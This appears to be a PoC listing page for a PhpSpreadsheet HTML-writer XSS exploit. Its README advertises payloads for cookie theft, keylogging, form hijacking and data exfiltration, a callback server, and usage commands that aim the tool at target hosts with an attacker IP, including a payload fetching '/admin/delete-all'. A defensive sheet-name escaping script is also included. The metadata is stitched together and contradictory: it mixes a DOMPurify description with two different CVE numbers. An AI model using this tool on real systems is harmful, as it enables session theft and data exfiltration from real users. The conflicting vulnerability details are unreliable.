
POC details: cb418944705d58cd9d35968609444be1f9112b7c

Source
Related vulnerability
Title: DOMPurify cross-site scripting vulnerability (CVE-2024-47875)
Description: DOMPurify is a JavaScript-based DOM (Document Object Model) sanitizer for HTML, MathML and SVG developed by Cure53. DOMPurify versions before 2.5.0 and before 3.1.3 contain a cross-site scripting vulnerability, which stems from the library being susceptible to cross-site scripting attacks.
Description
This is a PoC/exploit for CVE-2024-47875, the PhpSpreadsheet XSS vulnerability.
Introduction
# CVE-2025-22131 • PhpSpreadsheet HTML Writer XSS (PoC)

## Overview
This is a PoC for **CVE-2025-22131**, a Cross-Site Scripting (XSS) vulnerability in PhpSpreadsheet versions prior to 2.2.2, 2.1.2, and 1.29.4. The vulnerability resides in the HTML writer's generateNavigation() function, which fails to sanitize sheet names during XLSX-to-HTML conversion, so a crafted sheet name is copied into the generated page as live markup and enables malicious JavaScript injection.
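
As an added defensive example (not code from the PoC repository or from PhpSpreadsheet), the Python below reads the sheet names an XLSX declares in xl/workbook.xml, flags names carrying HTML metacharacters before such a file reaches an HTML converter, and shows the escaped navigation entry a fixed writer should emit. The `<li><a href="#sheetN">` shape of the entry and the in-memory single-part fixture are assumptions for illustration.

```python
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by xl/workbook.xml (SpreadsheetML main part and relationships).
SML_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
# Characters that open or terminate markup if copied raw into an HTML page.
HTML_META = re.compile(r"[<>\"'&]")


def sheet_names(xlsx_bytes: bytes) -> list[str]:
    """Return the sheet names declared in xl/workbook.xml of an XLSX archive."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        root = ET.fromstring(zf.read("xl/workbook.xml"))
    return [s.get("name", "") for s in root.iter(f"{{{SML_NS}}}sheet")]

def suspicious_sheet_names(xlsx_bytes: bytes) -> list[str]:
    """Sheet names carrying HTML metacharacters: harmless as workbook data, but
    live markup if a writer interpolates them into navigation HTML unescaped."""
    return [n for n in sheet_names(xlsx_bytes) if HTML_META.search(n)]

def navigation_link(name: str, index: int) -> str:
    """One navigation entry as a fixed writer should emit it (the <li><a> shape
    is assumed for illustration): the sheet name is HTML-escaped first."""
    return f'<li><a href="#sheet{index}">{html.escape(name, quote=True)}</a></li>'

def build_minimal_xlsx(names: list[str]) -> bytes:
    """Constructed fixture: an archive holding only xl/workbook.xml, which is
    all the check above reads (a real XLSX carries many more parts)."""
    sheets = "".join(
        f'<sheet name="{html.escape(n, quote=True)}" sheetId="{i}" r:id="rId{i}"/>'
        for i, n in enumerate(names, start=1))
    workbook = (f'<workbook xmlns="{SML_NS}" xmlns:r="{REL_NS}">'
                f"<sheets>{sheets}</sheets></workbook>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook)
    return buf.getvalue()

# Constructed sample: one benign sheet and one whose name carries markup.
SAMPLE_XLSX = build_minimal_xlsx(["Sheet1", "Totals<script>alert(1)</script>"])

if __name__ == "__main__":
    for i, name in enumerate(sheet_names(SAMPLE_XLSX), start=1):
        print("FLAGGED" if HTML_META.search(name) else "ok", navigation_link(name, i))
```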

CVE ID: CVE-2024-47875

GitHub Advisory: GHSA-79xx-vf93-p7cx

Affected Versions: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

Author: Roj

License: MIT

Repository: [PoC Repo](https://github.com/roj1py/CVE-2024-47875-PhpSpreadsheet-XSS-PoC)

---
## Features
- 📄 Generates malicious XLSX files with customizable XSS payloads
- 🛠️ Supports multiple payload types:
  - `cookie_theft`: Steals session cookies
  - `redirect`: Redirects users to an attacker-controlled site
  - `alert`: Displays a test alert for PoC
  - `keylogger`: Captures keystrokes
  - `form_hijack`: Intercepts form submissions
  - `data_exfil`: Exfiltrates data from a specified endpoint
- 🌐 Built-in HTTP server to capture exploit callbacks
- ⬆️ Uploads malicious XLSX files to a target endpoint
- 💾 Saves captured data (e.g., cookies) to a JSON file
- 🎨 Colorized terminal output for enhanced readability
- 🔍 Verbose logging for debugging

---
## Usage
```bash
python exploit.py -h
```
🚀 Usage Examples:
```bash
# Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50

# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
```
---
I wish to get feedback, and I wish luck to all of you.
File snapshot

```
[4.0K] /data/pocs/cb418944705d58cd9d35968609444be1f9112b7c
├── [ 25K] exploit.py
├── [1.0K] LICENSE
└── [1.9K] README.md

0 directories, 3 files
```